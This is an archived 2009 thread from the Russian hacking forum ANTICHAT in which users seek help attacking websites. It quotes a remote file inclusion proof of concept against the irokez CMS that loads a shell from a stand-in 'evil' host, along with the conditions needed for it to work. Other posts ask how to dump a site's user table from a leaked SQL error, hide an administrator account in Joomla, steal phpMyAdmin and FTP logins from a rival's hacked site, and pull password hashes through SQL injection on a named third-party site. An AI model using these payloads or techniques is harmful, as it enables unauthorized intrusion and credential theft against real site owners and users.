ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
31.01.2009, 04:18
|
|
Новичок
Регистрация: 09.01.2009
Сообщений: 3
Провел на форуме:
20437
Репутация:
5
|
|
Доброго времени суток. есть проблема.
Имеется сайт на движке irokez(на локальной машине). Нашел к нему на милворме php-инклуд. вот что там написано:
Код:
Vulnerable Code:
+ scripts/gallery.scr.php, line(s) 11-12:
+ -> 11: require_once "{$GLOBALS['PTH']['func']}gallery.func.php";
+ -> 12: require_once "{$GLOBALS['PTH']['classes']}gallery.class.php";
+ Proof Of Concept:
http://[target]/[path]/scripts/gallery.scr.php?GLOBALS[PTH][func]=http://evilsite.com/shell.php?
Я составил ссылку
http://irokez/scripts/gallery.scr.php?GLOBALS[PTH][func]=http://evil/shell.php?command=ipconfig
шелл не сработал... Выдал
Код:
Warning: main(gallery.func.php) [function.main]: failed to open stream: No such file or directory in Z:\home\irokez\www\scripts\gallery.scr.php on line 11
Fatal error: main() [function.require]: Failed opening required 'gallery.func.php' (include_path='.;/usr/local/php/PEAR') in Z:\home\irokez\www\scripts\gallery.scr.php on line 11
Что я делаю не так? |
|
|
31.01.2009, 12:57
|
|
Banned
Регистрация: 27.01.2009
Сообщений: 9
Провел на форуме:
96622
Репутация:
27
|
|
register_globals = on или off? для удачной эксплуатации нужно что бы был в on
|
|
|
|
31.01.2009, 13:00
|
|
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293
Репутация:
4915
|
|
f3d
1)
php.ini
=>allow_url_include = On
=>register_globals = on
2)
Файл http://evil/shell.php существует
3)
Баг не пофикшен
Это условия , при которых должно работать
Проверь всё это
|
|
|
|
31.01.2009, 13:05
|
|
Banned
Регистрация: 27.01.2009
Сообщений: 9
Провел на форуме:
96622
Репутация:
27
|
|
Сообщение от Platon
Подскажите можно-ли в joomla (1.5.4 ) имея полный доступ к FTP и к joomle создать там скрытую учетную запись - с правами администратора - но чтобы она в админ панели не светилась. И с помощью нее управлять cms.
Спасибо!
нет. нельзя
|
|
|
|
31.01.2009, 16:56
|
|
Новичок
Регистрация: 09.01.2009
Сообщений: 3
Провел на форуме:
20437
Репутация:
5
|
|
Сообщение от jokester
f3d
1)
php.ini
=>allow_url_include = On
=>register_globals = on
2)
Файл http://evil/shell.php существует
3)
Баг не пофикшен
Это условия , при которых должно работать
Проверь всё это
Это я проверил в первую очередь. все условия выполнены... Шелл точно есть... ini верно... баг не пофикшен т.к качал ту версию которая указана на милворме...
Мне просто интересно, может это у них ошибка.. и этот способ не работает, а они пабликуют не проверенную инфу...
|
|
|
|
01.02.2009, 18:08
|
|
Новичок
Регистрация: 01.02.2009
Сообщений: 1
Провел на форуме:
5994
Репутация:
0
|
|
Подскажите пожалуйста. Дело в том что есть один сайт. И на нем происходит чтото на подобе активации акаунта. Т.е. ты долженн ввести свой логин и пароль там в форму.
Все зашибись работает. Случайно наткнулся на такую вещь. Если повторно активировать аккаунт то MySQL выдает ошибку с логином пасом и мылом...
Database Error (44): Ошибка SQL: Duplicate entry 'Мой логин' for key 2 - INSERT INTO `users` (`email`, `username`, `password`) VALUES ('Мое мыло', 'Мой логин', 'Мой пасс') [ SYSPATH/classes/database/driver/mysql.php, line 347 ]
Source
SYSPATH/classes/database/driver/mysql.php, line 94
Mysql_Result->__construct(FALSE, Resource id #54, TRUE, 'INSERT INTO `users` (`email`, `username`, `password`) VALUES ('Мое мыло', 'Мой логин', 'Мой пасс')')
SYSPATH/classes/database.php, line 256 Database_Driver_Mysql_Core->query('INSERT INTO `users` (`email`, `username`, `password`) VALUES ('Мое мыло', 'Мой логин', 'Мой пасс')')
SYSPATH/classes/database.php, line 870 Database_Core->query('INSERT INTO `users` (`email`, `username`, `password`) VALUES ('Мое мыло', 'Мой логин', 'Мой пасс')')
SYSPATH/classes/orm.php, line 638 Database_Core->insert('users', array ('email' => 'Мое мыло', 'username' => 'Мой логин', 'password' => 'Мой пасс'))
APPPATH/classes/controller/activate.php, line 48 ORM_Core->save() Controller_Activate->index(FALSE)
SYSPATH/classes/kohana.php, line 335 ReflectionMethod->invokeArgs(object Controller_Activate { template => object View { kohana_filename => *PROTECTED*, kohana_filetype => *PROTECTED*, kohana_local_data => *PROTECTED*, kohana_global_data => *PROTECTED* }, corners => *PROTECTED*, styles => *PROTECTED*, cp_links => *PROTECTED*, auto_render => TRUE, input => object Input { use_xss_clean => *PROTECTED*, magic_quotes_gpc => *PROTECTED*, ip_address => , instance => *PROTECTED* } }, array ('id' => FALSE)) Kohana::instance()
SYSPATH/classes/event.php, line 205 call_user_func(array ('Kohana', 'instance'), )
SYSPATH/bootstrap.php, line 65 Event::run('system.execute') DOCROOT/index.php, line 92 require 'SYSPATH/bootstrap.php'
Подскажите возможноли с помощью этой зацепки выудить с сайта бд пользователей? Если да, то подскажите что делать. Весь день читаю различные статьи и ничего покачто не получяается
Последний раз редактировалось Xeo; 01.02.2009 в 18:14..
|
|
|
|
01.02.2009, 18:13
|
|
Познающий
Регистрация: 05.01.2009
Сообщений: 32
Провел на форуме:
146971
Репутация:
12
|
|
iSee - даже имея полный доступ? и к БД и к сайту. А если его создвть а потом в страничке админа прописать чтобы не показывал?
ну а можно хоть как-то шелл залить - чтобы потом все править на фтп?
Или прописать учетную запись в ручную, но чтобы админ не видел в панели?
Вообщем как получить контроль над джумлой не ставя в известность админа, имея полный доступ.
Спасибо
|
|
|
|
Доступ в phpmyadmin или ftp из DLE |
07.02.2009, 15:59
|
|
Новичок
Регистрация: 03.07.2008
Сообщений: 13
Провел на форуме:
24137
Репутация:
1
|
|
Доступ в phpmyadmin или ftp из DLE
Я знаю что у хостинга на котором я взломал сайт логин и пароль от фтп и пхпмайадмин одинаковый, у меня есть админка сайта недруга вот мне и нужно из этой админки как нибудь выдрать данные для входа в пхпмайадмин, таким образом я получу доступ и к ftp их сайта! Подскажите как достать этот логин и пароли из админки??? Если нужен шелл... то подскажите какой!
Буду очень благодарен тому кто ответит!
|
|
|
|
08.02.2009, 02:19
|
|
Новичок
Регистрация: 14.02.2008
Сообщений: 8
Провел на форуме:
26805
Репутация:
1
|
|
Стукни 316996655
|
|
|
|
10.02.2009, 03:27
|
|
Новичок
Регистрация: 26.06.2007
Сообщений: 27
Провел на форуме:
267117
Репутация:
1
|
|
Как витянуть пароли с jos_users если есть SQL-Inj в c om_fire boa rd:
http:// whi teg uard-cl an .ру/component/option,com_fireboa rd/func,fbprofile/task,showprf'[sql]/Itemid,5/userid,78/ ???
Делал так 20union%20select%20passwor d%20from%20jos_users но нет никакого результата
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
